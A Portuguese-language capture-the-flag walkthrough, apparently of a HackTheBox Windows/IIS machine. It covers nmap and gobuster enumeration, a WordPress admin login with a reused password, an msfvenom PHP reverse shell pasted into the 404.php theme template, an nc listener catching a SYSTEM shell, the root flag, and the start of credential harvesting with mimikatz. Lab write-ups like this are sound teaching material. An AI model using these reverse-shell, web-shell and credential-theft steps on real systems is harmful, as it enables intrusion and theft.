# nmap -sC -sV -v -Pn 10.10.10.29
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-22 10:55 EDT
..............................
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open mysql MySQL (unauthorized)
Vamos explorar os possíveis diretórios deste Servidor Web IIS:
# gobuster dir -e -u http://10.10.10.29 -w /usr/share/dirb/wordlists/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.29
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/09/22 10:57:33 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.29/wordpress (Status: 301) [Size: 152]
===============================================================
2021/09/22 11:02:31 Finished
===============================================================
Existe uma base de dados com vulnerabilidades do wordpress atualizada.
Plugins e themas do Wordpress possuem muitas vulnerabilidades.
A ferramentaa wpscan (https://wpscan.org) usa a base do wpvuln e ajuda a encontrar vulnerabilidades no WP, mas ele está começando a se tornar uma ferramenta paga =/
Você pode obter um token gratuito que vai liberar mais funcionalidades pra vocẽ. Por motivos de preservação, vou ocultar meu TOKEN.
Fiz algumas varreduras iniciais, mas nenhuma surtiu efeito esperado.
No laboratório passado (Vaccine), encontramos a senha "P@s5w0rd!"
Vamos tentar usá-la pra logar no painel do wordpress http://10.10.10.29/wordpress/wp-admin/
Feito isso, nosso caminho fica mais fácil para obter uma shell remota no sistema.
Exploração
Vamos gerar o shell reverso em php:
# msfvenom -p php/reverse_php LHOST=10.10.14.XX LPORT=8443 -f raw > shell.php
Basta editar os campos de IP e Porta para a sua realidade (veja seus dados da VPN). Vou copiar o conteudo do arquivo shell.php
Alternativamente, gosto de usar este shell:
No menu do wordpress, vamos abrir a opção "Appearence" / "The Editor", vamos ecolher a página 404.php, colar o código malicioso e salvar as alterações.
systeminfo
Host Name: SHIELD
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Pós Exploração
Antes de salvar arquivos no alvo Windows Server, preciso criar uma pasta em algum local que meu usuário limitado tenha permissão para gravar. Exemplo:
C:\inetpub\wwwroot\> mkdir teste
No exemplo acima, criei uma pasta chamada teste no diretório inetpub\wwwroot onde posso gravar meu arquivos maliciosos.
Agora já temos uma shell com usuário limitado. Mas precisamos escalar privilégios para uma conta administrativa.
Repare que agora, na sua janela linux, vai ter recebido uma nova shell com privilégio administrativo:
# nc -nvlp 1111
listening on [any] 1111 ...
connect to [10.10.14.76] from (UNKNOWN) [10.10.10.29] 51220
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
Vamos acessar a key para pontuar no HTB:
PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
6e9a9fdc6f64e410a68b847bb4b404fa
Credenciais Windows AD para posteridade!!!
Agora que somos administradores da máquina, vamos coletar alguma credencial válida da rede, pode ser útil nos laboratórios seguintes.
No seu kali, copie o mimikatz.exe para sua pasta atual: